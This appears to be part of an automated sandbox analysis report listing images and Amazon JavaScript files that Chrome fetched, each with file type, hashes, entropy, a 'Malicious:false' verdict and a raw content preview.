                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...................................................................!1A"6Qart...2BR......45Uqs.....#3STc....CV...$b..................................................Q..1....2Sa...".............?..t.(..(..(..(..(...o...^..#....s..Pd.....$.@<s...Ot./.7M...a.yF.@w..X..x.NU.q.U..`...]...TW...SSO.....Xi1.1Gl.......K...9.....l.......M......e.w11#...........gd.$1.eH...B..u......+....=.....Q.hF......IWV\.T....../...-_..M....(<W .......~.W..?..k..)..p.........m......}. ~./.....LL....T..m.......3.........zw...k...?....+...Q..[....f..g...e-........._g.9...7W.S...W....c...c)....2.u.._....$....."m{Q...0(.".n.u..AX..Ux...N.H..[NH.PO...@.....eP.B.Z.`....>X8.K...K[(....~ ..GO.@.e+..>.....$...F...H..($.R..R..R..R..R.......3..z...3...&:..........^v..4.&...I..*"ol*........U.#..q....._.?......S.F..u...pR`.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 167x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):11086
                                                                                                                                                                                                        Entropy (8bit):7.957933249968999
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:qk/yQh/2AkwRhFDPLTAFEAmCT+NJa3Y3TY4ukU0hvEuMI6J5n7X1Y0IDbSz68sMN:qk/ygXPLUFJmCTq0S7ukU+suJ6z7X9Iu
                                                                                                                                                                                                        MD5:1180FD3CE0DA7052A0D1AC809D95CA2D
                                                                                                                                                                                                        SHA1:E9F4CF0B2D2AE0D9EBC88818A2B224D2E79C41C9
                                                                                                                                                                                                        SHA-256:B0C58DF29283B0AC43261515DDBC4FFCB722760F9D09E8D5203F394511969FB1
                                                                                                                                                                                                        SHA-512:DDCF38826EE2DFEBA7E42C461BA096A237A66DEF651ABB536AFBA2BB1F16EB97243C76C282A84DFA235E136385B6C28785D8000C71435DBA300055E56493B18B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/71L9xtDPoLL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1."AQ.#2aqBr......34Rs.....Cb....S..Td....$%t..................................................!.1.Aq2Qa.....r..#$34...............?..x.*........rg~f..?....5?..>..."..".....o.....M...$..rN.X1..Q....'..............h.^ .>..[....@.\z.":..O.s....p.f.p.M..H.e|.l.......x..~...V.~........G..o.|.................S.>..~...ApN...K..>..?....]E.....,g...[.N..@7....4.....a..8..r..`....K"..D.*H....2.@;..A......|..F..`...t..Es.?.!...o......=^..C.o......._....K].x.=$.J1.~....{.I.B......t.>.......<...W*.}[..n:..+.[.w1....uGco..O/+...m.....Qq`.,...X+.....I..........u..O...k...=-S.R...2.t.G..........2..&.....p.. M..1.....S.%.Z7....'.....[.....a..=.....V"......~W.o..p.x..(.{.7.X...'.Q...GC_}H..O...>M...B)p...'.|~..j.#.Pr......W..|..?..E.>.I....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 250x389, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4423
                                                                                                                                                                                                        Entropy (8bit):7.760846232455229
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TDz98ZVP1uPiqxsZpkx+H9apqZB3ish8PrG+52UKDyBkS:PQVP1yxsZimaCish8Pr3LKyBkS
                                                                                                                                                                                                        MD5:8BB5B38EA5DCE06D43F659F3F908785E
                                                                                                                                                                                                        SHA1:9B95935F575B9657F082FAE4D8F084DE98F8D2AF
                                                                                                                                                                                                        SHA-256:D9C808A871D16EB3938BC7AD4E776C54532B5A098582C9E62EBCF2390D0F7586
                                                                                                                                                                                                        SHA-512:39F98A961D5BA13F20A308EDAD61BB7AFC848F8C39786250CB9F53CA2AE3A14DBE53613DCF187CB927A6CBB6EBD4477126ED050363582DE6510F21BC4C0FBF3D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........0.............................................................N.._Q....M.5.6...S^.aMzF...5.6 .`....+^.a.xF.F.3...Q....|.z_.t.v...~....`0.b.D+..I..........E/#...}.L<....>... ....0J.%..I1...0...q0../*.e.........'.....i.0L.4!.....`.....H8...>\Yl.>.y...}K.]LH...X.n...p......L..-.<yqK..;...o.O..u7mu(..Lm0.... .$Q!D..EA..D........+.}...........`........Bh.%.x....[.....rt.H(b......P.....4.pJ.g...K...^.y..I..7.3R...R....@...d...Z"j.4..{...zM....t.tt..B...NB...@...2Qr!EI.Ne..[?k......E......[.0b.!..b.@...E....&;....y........!..N(...@..$1....Z.T.).s....z7.?...k..k..X..I....) b.@....jN.T.&..v7..w. i..lF.....r... ...&.Z&\.H.2.X.;3..<}.4.[.G[..:..M..@....!..Jh..8.....c.gg.....k^.k(.`.,..hh........NIU../.....gj..................h...1!......$...[;g.??..5/W6.U.......(.1..h........e.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:C source, ASCII text, with very long lines (608)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):181147
                                                                                                                                                                                                        Entropy (8bit):5.399333328109369
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:7emi3shSYWTwt9VwNSn5qPsMomEW1whuuVIZ:7Vi3scYnVwNSn5qPNomEW1wMuqZ
                                                                                                                                                                                                        MD5:85831553613871261E4BCC9A3CD3ABF4
                                                                                                                                                                                                        SHA1:1CFBE1157C267BD2CE19AD2F19AE4C7C198AC328
                                                                                                                                                                                                        SHA-256:F159E8FFE5FC13AF167254BC6D2F1090774E5322BD3993A81A2A657D4159AA3F
                                                                                                                                                                                                        SHA-512:5B45F985066EE2D47B9A7B3C713FB1EC87AA790F25ED443D4F3A9BDF32FB91A174F88F5FD6481736010546C55DDE6E7413BE9E7A01E6BF54B39FA5CEF72DE6EA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/71MFMsTQG0L.js?AUIClients/IdentityWebAuthnAssets
                                                                                                                                                                                                        Preview:/*. regenerator-runtime -- Copyright (c) 2014-present, Facebook, Inc. -- license (MIT): https://github.com/facebook/regenerator/blob/main/LICENSE */.(function(I){var y=window.AmazonUIPageJS||window.P,p=y._namespace||y.attributeErrors,H=p?p("IdentityWebAuthnAssets",""):y;H.guardFatal?H.guardFatal(I)(H,window):H.execute(function(){I(H,window)})})(function(I,y,p){var H=function(){return function(t,y){if(Array.isArray(t))return t;if(Symbol.iterator in Object(t)){var E=[],H=!0,b=!1,c=p;try{for(var a=t[Symbol.iterator](),e;!(H=(e=a.next()).done)&&(E.push(e.value),!y||E.length!==y);H=!0);}catch(g){b=!0,c=g}finally{try{if(!H&&a["return"])a["return"]()}finally{if(b)throw c;.}}return E}throw new TypeError("Invalid attempt to destructure non-iterable instance");}}(),t="function"===typeof Symbol&&"symbol"===typeof Symbol.iterator?function(p){return typeof p}:function(p){return p&&"function"===typeof Symbol&&p.constructor===Symbol&&p!==Symbol.prototype?"symbol":typeof p},ba;(function(){function E(b
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (868)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):45047
                                                                                                                                                                                                        Entropy (8bit):5.6295063775589975
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:93gH7LGLsefSvvGeH7uRcWxcxoxXkDIIxrxtiXxq:KIsef+ixcxox0UIxrxyxq
                                                                                                                                                                                                        MD5:0609C804B4AF3A5B7AAF2625FA534FAB
                                                                                                                                                                                                        SHA1:C38C215156EF69FD048740BC5204E69D211068DB
                                                                                                                                                                                                        SHA-256:1017F870F22A6E6263DEDD0BE6D31FCC6DB9762F9540EAF31EE827B710A76D7B
                                                                                                                                                                                                        SHA-512:D6F316E751509E9CE01ECA64AF78473D87FC2E70F3B3F027A222D812FF1CF67585ABEB5B73534A388D4FEBB392667AC203A6F0832EE6E19325BCDC4D633A4B27
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(c){var b=window.AmazonUIPageJS||window.P,d=b._namespace||b.attributeErrors,a=d?d("ALMSavingsAssets@core","ALMSavings"):b;a.guardFatal?a.guardFatal(c)(a,window):a.execute(function(){c(a,window)})})(function(c,b,d){});./* ******** */.(function(c){var b=window.AmazonUIPageJS||window.P,d=b._namespace||b.attributeErrors,a=d?d("ConsumablesATCActionAssets",""):b;a.guardFatal?a.guardFatal(c)(a,window):a.execute(function(){c(a,window)})})(function(c,b,d){});./* ******** */.(function(e){var g=window.AmazonUIPageJS||window.P,n=g._namespace||g.attributeErrors,q=n?n("ALMCartActionAssets",""):g;q.guardFatal?q.guardFatal(e)(q,window):q.execute(function(){e(q,window)})})(function(e,g,n){function q(c,b){try{e.register(c,b)}catch(d){if(!d.message.includes("reregistered by ALMCartActionAssets"))throw d;}}function E(){var c=arguments;return{register:function(b,d){try{e.when.apply(e,c).register(b,d)}catch(a){if(!a.message.includes("reregistered by ALMCartActionAssets"))throw a;.}}}}e.when("ALMCar
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 350 x 450, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):14256
                                                                                                                                                                                                        Entropy (8bit):7.935047719221589
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:lxTA3vdo5DGwFf8U5JHP0gRUTKDrbymGanXyR5LdY/JBO:lxTAcGS0g6gRU+DK2nX02/JE
                                                                                                                                                                                                        MD5:64224EC939AC0B3487645C4E109030D5
                                                                                                                                                                                                        SHA1:B5AC2A7BC2AF1C9226987439F34BA8D4A79FBF0B
                                                                                                                                                                                                        SHA-256:2818F0BCCC7DDAA8E893C4655473D82589146DCC6E7AA6F78CEB9B3D4440C809
                                                                                                                                                                                                        SHA-512:9E2F8F391CA83B4DBD4170F91B30268F81D7F570E042699BD73135EA60BF3AE5AAA343F5BAE91430879DCF305914646499A6EF24C2E3CA604460585C3CCA7E31
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/G/39/gno/sprites/nav-sprite-global-1x-reorg-privacy._CB600087478_.png
                                                                                                                                                                                                        Preview:.PNG........IHDR...^..........QQ.....gAMA......a.....sRGB.........PLTEGpL...........................................................................................I..C..............................................................3..........................2...........-...............................................2........2..*...........3..2.....2...........1..2..........................2w.............2...w........v.......2.....-.....2............w....2.....2w........w....2..2..2.....3...$$$.....2...........2......w....2...w..222..2........2............w.......2.........333..........g.......8...........?R ...v..***...333v..v..............v..................f..e....222...................n....v.....222.f..e.......222.e.....g..d.........3......w.."/?.f....333.............r....~..1=L[..s.....mu.......Q[h...[eqdmx;GT\|......tRNS........@..........'`..<.F.Q......c.pD...+..0.#3wJ.........m.^[...7_..V.....N.....s....fA...../...{..|N....j..l..-Mv&i.9#..~..$...6i...e9...D.y0xy/...zG..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):48950
                                                                                                                                                                                                        Entropy (8bit):7.963333607058689
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:83AZUS01W7NNNNKzXxmQViG7l0wK+4x0Zc/TfigEC+Vne8oWNIIzYUSuhO7jaZMM:aIUt1lx/VBlm+ZcDibC+VBocsUSv7Ia4
                                                                                                                                                                                                        MD5:A7350B040766C811565CE21F8D833908
                                                                                                                                                                                                        SHA1:1F8DAEF415AFD88E5D8B485E5C7D62941492BCD3
                                                                                                                                                                                                        SHA-256:EA2AC38C7E469084C70A134C536A212791FFC8AE20DEC4719ED555F6C61314AF
                                                                                                                                                                                                        SHA-512:F8DDA1C80EFBB0AA28C84E85276A495D226C53DA58665642DB7F3E9671C1CA3ED38E26BC58CBD8D41565B506B70916F99F7D13304AD5C1FC79BCC08EF9CBA31F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986213_UAE_Budget_Store_AE_xsite_bubbler_beauty_en_400x400_2X._CB644457596_.jpg
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................................;...................................................................................[a.....]...p.6.[..?\...^_~.U.._..J.......................`.....^...(.vE....../{~.H.]!%.!.9..~............ti....sdV.9..w8........%.*fv.......>P........~x...;4Ch.$){6............S&{F.%,..................+-..............lw<vM..\.l.........&[....].......r\4.z.'.~h.?:....z.....<S..o.......D87!......8}.....?.E..o.O.{.E..F....G..'x....1.l..........L...%.. .....,......@......u/{o......\...co5k.'.;bS....G...h...E[.m.5.*...e7#....i........D9.r8......y.../...Mb.k..t......H....ik.8wk-.....T..^.N....O`.b.(.0'Tv....;E...5.,.q.......<........n....i.L.2{...E..?*.-...9.-....4<u."..eW.s........H."e6.....q...A..>...........u......a.MY..6..7.C..q.G.yfLM.1.......r........x...*.<..........8.{1...l0...........F<...].a.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):212
                                                                                                                                                                                                        Entropy (8bit):5.024547197873229
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:2LGDtF4IzO/Bqkhab4KYK7ozXRX+1MRR1anMAuLhtI:2Q3JC/BVab4NK7ozgMzI
                                                                                                                                                                                                        MD5:A89B195ADFBD74DF01D742D52F6A7CC1
                                                                                                                                                                                                        SHA1:E317DA5F24B8E6A065C21D76CA4C1DFA1A6E7FFC
                                                                                                                                                                                                        SHA-256:9B411C1889EAE287307FC107B63A057DCC591A991E6B659444D52DC745161347
                                                                                                                                                                                                        SHA-512:EEA841E996291935051C3C8E8C98B5A549C309D4F45B619F15B339F69660F3A8673DF8C3F2352B3EE20EEC7B738617AE1343128D59D10A6E821642EFE79091E9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(c){var b=window.AmazonUIPageJS||window.P,d=b._namespace||b.attributeErrors,a=d?d("BuyBackCartAssets",""):b;a.guardFatal?a.guardFatal(c)(a,window):a.execute(function(){c(a,window)})})(function(c,b,d){});
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4238
                                                                                                                                                                                                        Entropy (8bit):7.704720238700568
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:R9+0YkxK07wxusjK47D0fo6LBySHzUUcdVCDbjux+z:e0wFz6LByhUC+nuk
                                                                                                                                                                                                        MD5:E085596AD1756B346493432818245583
                                                                                                                                                                                                        SHA1:499B90D2BCF4AF80F68AEEEE3A63044410AE70E1
                                                                                                                                                                                                        SHA-256:7ED66F86F3E12C85F976D5FEE535B26EF0EB45BCA3E6D32D985E44FC2E42FE20
                                                                                                                                                                                                        SHA-512:0396935B35D79CEDAE2164C64BED24A9E7118DB548C171B41D8E1AB8522F66B68543F1C8F1690432ED0B3C8324FAB752B0D5A69A2535EEAA8FF9BF29294FE7A9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......Exif..II*.................Ducky.......(......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:6C265640478A11EFBAE58FF32B0F82A0" xmpMM:InstanceID="xmp.iid:6C26563F478A11EFBAE58FF32B0F82A0" xmp:CreatorTool="Adobe Photoshop 2024 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="7432AE9D7C846B33C16FC475697925A7" stRef:documentID="7432AE9D7C846B33C16FC475697925A7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d...................b....................................................$$''$$53335;;;;;;;;;;.............................%......% #...# ((%%
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 168x226, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5072
                                                                                                                                                                                                        Entropy (8bit):7.907748653614744
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:T/vY5ebLwWl2LCY+d+PYzgoGjJ6YVbln8QJngeSBJRZDwXxDx6e6I3taEslgDcaK:DbLw7tnP6md68n5JngeoR2hDxQ2FslBZ
                                                                                                                                                                                                        MD5:28B10CADED57957B943FB41146B637D7
                                                                                                                                                                                                        SHA1:6772D9A09A99E66A01B24BD10DA257C3C3647B89
                                                                                                                                                                                                        SHA-256:C0F801ADB4BCEAAD18C9E0EAFE04954C40C5660E67EA358E79B29C5878F5B8A2
                                                                                                                                                                                                        SHA-512:6FADAC96B061A21A7086BC2564CA0834725B930934E1CBE46A908AAEBAEE190EF927CCFEAC78EB3283576F3A86007555E7453DA4724B454E68103C6A4EA5F71E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."............................................................!...1AQ..."aq2R....%Bbrt...#3S...4CT....$...5s................................................!...1...2A"#Qa..............?.....e..d..K.I.^}...w..K...8...Y...&.........2..6.u^_...pu.....G..h..z.....,.A...2..vs..'....M.o.....b].|..f.b..2..z&...Z(.s<..F{<.1..*.L...8.:3|o..S....\..kwZ.......Hiz9.3...W.K..?....^.EC.r..SU)lq.E.3..7J.f....O.9:e.{t..u...(0|..^...{.........Km2...>......3......v.6...../.5.......t<....=h^...o.'q3qrmv.,..K.U0...I.Z....ZZ..6p.7..4=)B..!.B..B..B.h.Y..q.x.....D...:c....ELF.7..q..>...*.)C ..4/....X.`.b..J.D..c.L..]...:....q..J.%&H..i..Q2fnKU.9..........n...o......{dG=Vu...X.+.ce...3..E..4kn.%..pb14|..B ...Hdi..+..~...g.x..G&.....].!..< ...1.,""..F. ..)2=-B....!..!..!.....:.,q.^..V.-#..M9.7._....R.b.L .M.Kn..a[T.6..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 226x226, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6685
                                                                                                                                                                                                        Entropy (8bit):7.875493204428111
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:aGAwLw6+VJevplpDQlVtFZjXbIXT+N7mB:x/+V6DefXbIXTeE
                                                                                                                                                                                                        MD5:747BDF037BF8934D668D6676748734C4
                                                                                                                                                                                                        SHA1:E0945312571FE6950548130CAE0B4D8274C472A8
                                                                                                                                                                                                        SHA-256:E828A47BFF8F40A8F95BC80BD87ACE06EB4B31CB4CF9F975E9CC0885C01E329A
                                                                                                                                                                                                        SHA-512:B82E04E96B798CAAD39EDB6005DBD2E13BDF8523E96F7E2C5DE1DA3493320BA6CE3CE325577EB3FB213812321831D89699A850D12926CB68DA54444FCDFA96FD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3..................................................................y.. ..pW$.`E...R"V..."...A....6....]q.. .t...R.......a\%..q"..Z.W.-......D.(...>..G^y...../.l........XP...k.Q....:"`.."$...Q.....=;d.4.x;..em..%.Uea..2.j...."JR`........n..lB..."........IIU.k.k..`."&.R..Y..P.-...?..#P...UB!..Ej...k....E...V.kK...++...*.5$.'..|.^....G.YT.\.\......8..t%.....V..`.T...L.,\...R`....J.u+....hL#?.:..?..........r.b=N.Q<.E.>UI....]..4..59.L.*.SL1N.v.6..../"..N/..r..,....2.w.O.e..{.}.........G......qTL,.~nv.u.\....;q...r+.9.9..q.[..f..O_..5..Gi.....U.L.H.,...k.03s..2.s}#..k..........._.O..:....=>?"..3..W..W....b.K.V.%.Z.K....A..3.1.m...P...Jk..{..y_O,..=.....cd...1[Z..m'X..4.o.....Tm9..Dk.......C.L...=Uo5..Z..T.i.,V=bSz.......f.i.'e.A.u^S...^.NI.G...#.....m.c..X..j. 6......u a._...,.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (562)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):317121
                                                                                                                                                                                                        Entropy (8bit):5.382549810640479
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:xYcQZMuZ7q9P1+pKbaMKNwCe3DNEz7+OeQm81AWWwIty8cIQygwYvsjfq08:xYXUMKbaMKaC3m81bVItyb5wYUrq08
                                                                                                                                                                                                        MD5:EDA8128C6BF3EBC56B6C8687CD5C8C74
                                                                                                                                                                                                        SHA1:6AC6DDF899CFDCCF21D5D473FF96029EFEA4D2B5
                                                                                                                                                                                                        SHA-256:F096709892C962D8E2C2E5A886DA566F5FF23095E0BA1D49CEFCD5F80B6459B5
                                                                                                                                                                                                        SHA-512:4635AB9CDE70878F17B6A2975154233FF99B44FC965B01805CCD3E6DA888F3B47FFA9E1FD5BF6D0C644C95317FB62CD93F47C4BFCCC153ADDDAFEBEFFB54B9A7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://images-eu.ssl-images-amazon.com/images/I/61xJcNKKLXL._RC%7C11Y+5x+kkTL.js,51KMV3Cz2XL.js,31x4ENTlVIL.js,31f4+QIEeqL.js,01N6xzIJxbL.js,518BI433aLL.js,01rpauTep4L.js,31QZSjMuoeL.js,61ofwvddDeL.js,01KsMxlPtzL.js_.js?AUIClients/AmazonUI"
                                                                                                                                                                                                        Preview:/*. jQuery JavaScript Library v1.6.4. http://jquery.com/.. Copyright 2011, John Resig. Dual licensed under the MIT or GPL Version 2 licenses.. http://jquery.org/license.. Includes Sizzle.js. http://sizzlejs.com/. Copyright 2011, The Dojo Foundation. Released under the MIT, BSD, and GPL Licenses... Amazon elects to use jQuery and Sizzle under the MIT license... Date: Mon Sep 12 18:54:48 2011 -0400. Sizzle CSS Selector Engine. Copyright 2011, The Dojo Foundation. Released under the MIT, BSD, and GPL Licenses.. More information: http://sizzlejs.com/.*/.(function(H){var r=window.AmazonUIPageJS||window.P,p=r._namespace||r.attributeErrors,J=p?p("AmazonUIjQuery","AmazonUI"):r;J.guardFatal?J.guardFatal(H)(J,window):J.execute(function(){H(J,window)})})(function(H,r,p){r.navigator&&r.navigator.userAgent&&H.declare("jQuery",function(){function J(a,b,d){if(d===p&&1===a.nodeType)if(d="data-"+b.replace(gb,"-$1").toLowerCase(),d=a.getAttribute(d),"string"===typeof d){try{d="true"===d?!0:"false"===
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x39, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):9461
                                                                                                                                                                                                        Entropy (8bit):7.914567271701472
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:D2hRS1YzeKI34hEP58jb35gU6NyOGt7lUoNJqmn7DIWB:9KzrI34yB635ON5A7TJx7DjB
                                                                                                                                                                                                        MD5:46407B5D65AABA2AD7B3633A80475EDE
                                                                                                                                                                                                        SHA1:AE8129386B30ED4D22346D3AFB2C7963D50DA793
                                                                                                                                                                                                        SHA-256:8AFFC3C8715D4CE3AC20C6637BE3920B2A84C3901913E6D8B88F83B2D18056C7
                                                                                                                                                                                                        SHA-512:1524B465D5E5998523096BF8B1BF4B02097B37B9433D163F0351C91F8E42A1CDE211635B305BAFDB6211E4D4BF0B32AC4AB8F6F988384E50957436D601DC3886
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
